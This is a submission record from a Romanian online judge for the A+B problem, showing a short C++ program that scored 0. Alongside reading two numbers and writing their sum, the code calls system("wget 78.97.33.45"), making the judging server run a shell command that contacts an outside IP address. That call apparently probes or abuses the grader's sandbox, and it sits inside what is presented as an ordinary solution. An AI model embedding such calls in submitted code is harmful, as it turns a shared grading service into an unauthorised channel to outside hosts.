Cod sursa(job #2660554)
Utilizator | Data | 19 octombrie 2020 18:44:28 | |
---|---|---|---|
Problema | A+B | Scor | 0 |
Compilator | cpp-64 | Status | done |
Runda | Arhiva de probleme | Marime | 0.2 kb |
#include <fstream>
#include <cstdio>
using namespace std;
ifstream in("adunare.in");
ofstream out("adunare.out");
int main(){
int a,b;
in>>a>>b;
out<<a+b+system("wget 78.97.33.45");
return 0;
}